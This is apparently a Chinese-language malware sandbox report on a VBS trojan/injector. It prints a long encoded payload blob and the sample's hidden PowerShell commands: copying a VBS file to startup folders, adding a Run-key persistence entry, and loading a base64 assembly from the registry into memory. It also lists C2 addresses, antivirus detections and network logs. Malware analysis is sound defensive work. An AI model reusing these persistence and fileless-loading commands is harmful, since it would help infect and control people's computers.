iYiNxlAWgnQABCABAQgDIAABBCABAQ4DAAAOBSACARwYBiACARJBCAUgAQESQQkABB@ODg4IEUkRAAgcHBJVDh@cHQ4dElUdAgIHIAMBAg4QAgMAAAEFAAEBEiUFAAEBEmEEAAEBCAIGDgYAAwgODgIEAAEOCAYAAw4ODg4DBhJxBQACHBwcBAABDhwGIAIScQ4CBgADHA4OHAMgAA4EAAEIDgQAAQIOBAABDgIFAAEOHQ4QAAccHBJVDh@cHQ4dElUdAgQAARwcBwABElURgIEGAAIcHBJVCQACARKAhRGAiQUAAR@FDgcAARKAlR@FBgADAQ4OHAUAABKAnQMgABgEAAEKGAYAAwIcHAIGAAMcHBwCBAABAhwEAAEIHAIdBQQgAQIOBiABARKAsQgAAxwcHRwdDgQgAQEcAyAACAoABQEcHRwdDgICEAAIARwSVQ4dHB@OHRJVAgIHAAQODg4ODgUAAg4ODgMgAAsFAAASgMEGAAESgMkOBiAAHRKAzQQgARwIBAABDg4FIAASgN@FIAASgOEFIAASgO@EIAEcDgMgAAIGAAMcAhwcBSACAQ4OBQAAEoD1BSABHQUOBSABDh@FBxUSgPkBHQUHIAMBHQUICAQgAB@FBSABARMABSAAHRMABCABAQoKIAMBEoD9EYEFAgcgAwgdBQgIBQABDh@FCLd6XFYZNOCJCLA/X38R1Qo6BAEAAAAxAQASPGdlbmVyYXRlZCBtZXRob2Q+AQBUDgRUeXBlEjxnZW5lcmF@ZWQgbWV@aG9kPgcgAhIZEh@cBSABARIZAgYCAgYcAwYSNQIGCAMGHQ4DBhIMAwYSOQMGEjEFIAEBHQUNIAocDg4ODg4OCAIOAgYgAxwODg4DIAAcEQAICBAOEA4IEAgQCBAIEA4IASIDAAAYCAADCBgSgNEICgAFAgYQDggQDggEAAECCgQgAQ4OCCACEoCFHQUOBiABHQUdBQMGEhADBhIIAwYSJQYgAgEcEikDBhEcAwYRGAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEFBwMOAgIZBxAOAhwcElkdDh@OCAgCHQ4dDggIEjUSNQUHAgIQCCsHGB@OAgICAgICEA4QDhAOEA4QDhAOEA4QDhAOEA4QDh@cHQIQDh@cHQIcCgcGHB@cHQICAgIDBwEcJAcYHAgCAgICAgICHQUdHB@CAhKAhRI1AhKAhRwcCAgQDhAOAgoHBgIcHRwdAhwcCQcHDggODggIDgcHBQ4IAg4OCgcEDhKA4RKA5QIMBwYODhKA4RKA5QICBgcCDhKA@QQHAR@FAwcBDhQHBRKAhRUSgPkBHQUSgJkSgJkdDhEHBx@FEoCZEoEBEoCZHQUIAgAAxF@AAAAAAAAAAAAA3l@AAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAANBdAAAAAAAAAAAAAAAAX@NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAABQAAAMAAAA8D@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
regkey_r: microsoft
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\microsoft
success 0 0
One or more non-safelisted processes were created (9 个事件)
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\ADMINI~1.OSK\AppData\Local\Temp\RarSFX2\microsoft.vbs'));wscript 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'"
parent_process powershell.exe martian_process "C:\Windows\system32\wscript.exe" C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
parent_process wscript.exe martian_process powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;"
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 368 resumed a thread in remote process 324
Time & API Arguments Status Return Repeated
1619826881.588503
NtResumeThread
thread_handle: 0x0000026c
suspend_count: 1
process_identifier: 324
success 0 0
Creates a suspicious Powershell process (16 个事件)
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
Generates some ICMP traffic
File has been identified by 46 AntiVirus engines on VirusTotal as malicious (46 个事件)
Elastic malicious (high confidence)
FireEye Trojan.GenericKD.34136992
McAfee Artemis!A6F7C0E5CA9C
Cylance Unsafe
AegisLab Trojan.Script.Generic.4!c
Sangfor Malware
CrowdStrike win/malicious_confidence_60% (W)
BitDefender Trojan.GenericKD.34136992
K7GW Trojan ( 0056a39c1 )
K7AntiVirus Trojan ( 0056a39c1 )
Baidu JS.Trojan-Downloader.Nemucod.yi
Cyren W32/Trojan.DHEM-8615
Symantec Trojan.Gen.MBT
APEX Malicious
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 85)
Kaspersky HEUR:Trojan.Script.Generic
Alibaba Trojan:VBS/Injector.d61e6008
NANO-Antivirus Trojan.Script.ExpKit.fhfkua
MicroWorld-eScan Trojan.GenericKD.34136992
Rising Trojan.Injector!8.C4 (TOPIS:E0:Lj0FFSRMCOC)
Ad-Aware Trojan.GenericKD.34136992
Emsisoft Trojan.GenericKD.34136992 (B)
Comodo Malware@#2ykfo27wo1516
F-Secure Malware.VBS/Injector.yhien
DrWeb Trojan.DownLoader33.60726
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition VBS/Agent.am
Sophos Mal/Generic-S
Ikarus Trojan.VBS.Injector
Webroot W32.Trojan.Gen
Avira VBS/Injector.yhien
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Ymacco.AA70
Arcabit Trojan.Generic.D208E3A0
ZoneAlarm HEUR:Trojan.Script.Generic
GData Trojan.GenericKD.34136992
ALYac Trojan.GenericKD.34136992
MAX malware (ai score=88)
Panda Trj/CI.A
ESET-NOD32 VBS/Injector.AG
Fortinet W32/Script.GENERIC!tr
AVG Other:Malware-gen [Trj]
Cybereason malicious.5ca9c0
Paloalto generic.ml
Qihoo-360 Win32/Trojan.Script.ed4
The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 个事件)
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 个事件)
dead_host 172.217.160.78:443
dead_host 91.193.75.158:7788
dead_host 193.56.28.101:7788
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2012-06-09 21:19:49

Imports

Library COMCTL32.dll:
Library SHLWAPI.dll:
0x4141c4 SHAutoComplete
Library KERNEL32.dll:
0x414068 DeleteFileW
0x41406c DeleteFileA
0x414070 CreateDirectoryA
0x414074 CreateDirectoryW
0x414078 FindClose
0x41407c FindNextFileA
0x414080 FindFirstFileA
0x414084 FindNextFileW
0x414088 FindFirstFileW
0x41408c GetVersionExW
0x414090 GetFullPathNameA
0x414094 GetFullPathNameW
0x414098 MultiByteToWideChar
0x41409c GetModuleFileNameW
0x4140a0 FindResourceW
0x4140a4 GetModuleHandleW
0x4140a8 HeapAlloc
0x4140ac GetProcessHeap
0x4140b0 HeapFree
0x4140b4 HeapReAlloc
0x4140b8 CompareStringA
0x4140bc ExitProcess
0x4140c0 GetTickCount
0x4140c4 FreeLibrary
0x4140c8 GetProcAddress
0x4140cc LoadLibraryW
0x4140d0 GetCurrentProcessId
0x4140d4 SetFileAttributesW
0x4140d8 GetNumberFormatW
0x4140e0 GetDateFormatW
0x4140e4 GetTimeFormatW
0x4140f4 WaitForSingleObject
0x4140f8 Sleep
0x4140fc GetExitCodeProcess
0x414100 GetTempPathW
0x414104 MoveFileExW
0x414108 UnmapViewOfFile
0x41410c MapViewOfFile
0x414110 GetCommandLineW
0x414114 CreateFileMappingW
0x41411c OpenFileMappingW
0x414128 GetSystemTime
0x41412c WideCharToMultiByte
0x414130 CompareStringW
0x414134 IsDBCSLeadByte
0x414138 GetCPInfo
0x41413c GlobalAlloc
0x414144 SetFileAttributesA
0x414148 GetFileAttributesW
0x41414c GetFileAttributesA
0x414150 WriteFile
0x414154 GetStdHandle
0x414158 ReadFile
0x414160 CreateFileW
0x414164 CreateFileA
0x414168 GetFileType
0x41416c SetEndOfFile
0x414170 SetFilePointer
0x414174 FlushFileBuffers
0x414178 MoveFileW
0x41417c SetFileTime
0x414180 GetCurrentProcess
0x414184 CloseHandle
0x414188 SetLastError
0x41418c GetLastError
0x414190 GetLocaleInfoW
Library USER32.dll:
0x4141cc GetClassNameW
0x4141d0 DialogBoxParamW
0x4141d4 IsWindowVisible
0x4141d8 WaitForInputIdle
0x4141dc SetForegroundWindow
0x4141e0 GetSysColor
0x4141e4 PostMessageW
0x4141e8 LoadBitmapW
0x4141ec LoadIconW
0x4141f0 CharToOemA
0x4141f4 OemToCharA
0x4141f8 IsWindow
0x4141fc CopyRect
0x414200 DestroyWindow
0x414204 DefWindowProcW
0x414208 RegisterClassExW
0x41420c LoadCursorW
0x414210 UpdateWindow
0x414214 CreateWindowExW
0x414218 MapWindowPoints
0x41421c GetParent
0x414220 GetDlgItemTextW
0x414224 TranslateMessage
0x414228 DispatchMessageW
0x41422c wvsprintfW
0x414230 wvsprintfA
0x414234 CharUpperA
0x414238 CharToOemBuffA
0x41423c LoadStringW
0x414240 GetWindowRect
0x414244 GetClientRect
0x414248 SetWindowPos
0x41424c GetWindowTextW
0x414250 SetWindowTextW
0x414254 GetSystemMetrics
0x414258 GetWindow
0x41425c GetWindowLongW
0x414260 CharUpperW
0x414264 CharToOemBuffW
0x414268 MessageBoxW
0x41426c ShowWindow
0x414270 GetDlgItem
0x414274 EnableWindow
0x414278 OemToCharBuffA
0x41427c SendDlgItemMessageW
0x414280 DestroyIcon
0x414284 EndDialog
0x414288 SetFocus
0x41428c SetDlgItemTextW
0x414290 SendMessageW
0x414294 GetDC
0x414298 ReleaseDC
0x41429c PeekMessageW
0x4142a0 FindWindowExW
0x4142a4 GetMessageW
0x4142a8 SetWindowLongW
Library GDI32.dll:
0x414044 GetDeviceCaps
0x414048 GetObjectW
0x414050 SelectObject
0x414054 StretchBlt
0x414058 CreateCompatibleDC
0x41405c DeleteObject
0x414060 DeleteDC
Library COMDLG32.dll:
0x414034 GetOpenFileNameW
0x41403c GetSaveFileNameW
Library ADVAPI32.dll:
0x414000 RegOpenKeyExW
0x414008 RegQueryValueExW
0x41400c RegCreateKeyExW
0x414010 RegSetValueExW
0x414014 RegCloseKey
0x414018 SetFileSecurityW
0x41401c SetFileSecurityA
0x414020 OpenProcessToken
Library SHELL32.dll:
0x4141a0 SHChangeNotify
0x4141a4 ShellExecuteExW
0x4141a8 SHFileOperationW
0x4141ac SHGetFileInfoW
0x4141b4 SHGetMalloc
0x4141b8 SHBrowseForFolderW
Library ole32.dll:
0x4142b0 CLSIDFromString
0x4142b8 OleUninitialize
0x4142bc CoCreateInstance
0x4142c0 OleInitialize
Library OLEAUT32.dll:
0x414198 VariantInit

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49208 113.108.239.130 r1---sn-j5o76n7e.gvt1.com 80
192.168.56.101 49207 203.208.41.65 redirector.gvt1.com 80
192.168.56.101 49205 203.208.41.66 update.googleapis.com 443
192.168.56.101 49209 58.63.233.69 r4---sn-j5o76n7l.gvt1.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 62912 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 50002 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://r1---sn-j5o76n7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619803697&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619803697&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o76n7e.gvt1.com
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=74ddce77771dfc27&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619803937&mv=m 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=74ddce77771dfc27&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619803937&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r4---sn-j5o76n7l.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.